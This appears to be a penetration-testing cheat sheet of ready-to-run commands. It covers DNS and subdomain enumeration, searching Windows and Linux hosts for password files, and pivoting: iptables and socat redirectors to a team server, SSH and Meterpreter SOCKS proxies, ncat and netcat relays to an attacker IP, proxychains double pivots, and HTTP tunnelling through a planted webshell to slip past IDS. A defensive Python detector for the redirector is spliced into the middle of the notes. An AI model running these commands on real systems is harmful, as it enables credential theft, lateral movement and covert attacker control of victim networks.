LDAP & DNS

DNS Recon

dnsrecon -d website.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml

# Look up website.com using a wordlist with the standard enumeration type; write the output to the XML file dnsrecon.xml

dnsrecon -d website.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml --name_server 8.8.8.8

DNS Enum

dnsenum --dnsserver x.x.x.x -enum www.fakewebsite.com

SUBDOMAIN Enum

sublist3r -d www.blah.com -t 3 -e bing

Dig

DIG = Domain Internet Groper

Get IP

dig www.blah.com

Get IP using another DNS server (useful if UDP 53 is open on the target server)

dig @8.8.8.8 www.blah.com

Do a reverse lookup

dig @8.8.8.8 -x 8.8.8.8

Dig all the things

dig www.blah.com ANY

Low Hanging Passwords

Enumerate passwords on Windows

dir /b /a /s c:\ > cdirs.txt

After downloading the .txt file to the attacker's machine, open it.

Parse for keywords
command: type cdirs.txt | findstr /i passw
After finding an interesting file or directory
command: type c:\Users\Fred\Documents\passwords.txt

One thing to remember is that we only enumerated the c:\ drive on the PC. There could be other network drives.

Enumerate passwords on Linux

We search /etc for the word password.
It could also be in /home or /var, or under the word pwd.

grep -rnw '/etc' -ie "password" --color=always 2> /dev/null

Pivots, forwarders, relays

HTTP Forwarding with iptables

My environment in this lab:

  • Team server and its listening port: 10.0.0.2:80
  • Redirector host and its listening port: 10.0.0.5:80
  • Victim host: 10.0.0.11

An easy way to create an HTTP redirector is to use a Linux box and its iptables capability.

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.2:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1
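As a defender-side check added to these notes (not part of the original cheat sheet), the following Python parses an `iptables-save` dump and flags the DNAT + MASQUERADE + open FORWARD + ip_forward combination that such a redirector leaves behind on a host. The sample dump is constructed from the rules above, and the ip_forward value is assumed to be read by the caller from /proc/sys/net/ipv4/ip_forward.

```python
import re

# Constructed sample of `iptables-save` output from a host configured with the
# redirector rules above (built for this example, not captured from a real box).
SAMPLE_IPTABLES_SAVE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.2:80
-A POSTROUTING -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A FORWARD -j ACCEPT
COMMIT
"""

DNAT_RE = re.compile(r"^-A PREROUTING\b.*--dport (\d+)\b.*-j DNAT --to-destination (\S+)")

def parse_tables(dump):
    """Split an iptables-save dump into {table_name: [policy and rule lines]}."""
    tables, current = {}, None
    for line in dump.splitlines():
        line = line.strip()
        if line.startswith("*"):
            current = line[1:]
            tables[current] = []
        elif current and line and line != "COMMIT" and not line.startswith("#"):
            tables[current].append(line)
    return tables

def find_redirector(dump, ip_forward):
    """Flag DNAT-based forwarding. ip_forward is the integer read by the caller
    from /proc/sys/net/ipv4/ip_forward (assumed, not parsed here)."""
    tables = parse_tables(dump)
    nat, filt = tables.get("nat", []), tables.get("filter", [])
    dnats = [{"dport": int(m.group(1)), "to": m.group(2)}
             for line in nat if (m := DNAT_RE.match(line))]
    masquerade = any("-j MASQUERADE" in line for line in nat)
    # FORWARD is open if its policy is ACCEPT or a blanket ACCEPT rule exists.
    forward_open = any(line.startswith(":FORWARD ACCEPT") or
                       (line.startswith("-A FORWARD ") and line.endswith("-j ACCEPT"))
                       for line in filt)
    # All four together are the signature of the redirector configured above.
    return {"dnat_rules": dnats, "masquerade": masquerade, "forward_open": forward_open,
            "ip_forward": ip_forward == 1,
            "likely_redirector": bool(dnats) and masquerade and forward_open and ip_forward == 1}
```

On a live host, feed it the output of `iptables-save` together with the value of `/proc/sys/net/ipv4/ip_forward`; a DNAT rule on its own is not conclusive, so alert on the full combination.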

HTTP Forwarding with socat

socat is another tool that can be used to do “dumb pipe” traffic forwarding.
The environment in this exercise remains the same as in the previous scenario.

Setting up an HTTP redirector with socat:

socat TCP4-LISTEN:80,fork TCP4:10.0.0.2:80

SSH pivot

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>

Metasploit with Meterpreter

msf5 > route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j

Ncat HTTP proxy

$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:

$ ncat -lv --broker -m2 <port>

On pivot machine:

$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target>"

Netcat Port Forwarder

On pivot machine:

mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot

Proxychains Setup

Install and configure proxychains

tail /etc/proxychains.conf
#socks4 127.0.0.1 9050
http 172.21.0.3 3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>

Double Pivot Proxychains

# Pivot 1 using proxychains
ssh -D 1080 user@IP_Network1

# Configure /etc/proxychains.conf to set port 1080
# Pivot 2 using proxychains
proxychains ssh -D 1081 user@IP_Network2

# Configure /etc/proxychains.conf to set port 1081

proxychains nmap...

PivotSuite

# Similar features to other tools, but supports multilevel pivots
# like Metasploit

# "Remote" local port forwarding
# On the pivot
$ pivotsuite -S -F --server-option=PF --forward-ip=10.42.42.2 --forward-port=80 --server-ip=192.168.2.105 --server-port=8080

# "Remote" dynamic port forwarding
$ pivotsuite -S -F --server-option=SP --server-ip=192.168.2.105 --server-port=8080

Tunna / Fulcrom (HTTP)

# Everything goes through HTTP
# Bypasses some IPS/IDS

# First step is to deploy a webshell on the target
# Some ship with the tool (but are not good)
# Can be hard to use

# Then on the attacker machine
python2 proxy.py -u http://192.168.2.105:8080/conn.php -l 7777 -r 80 -a 10.42.42.2 -v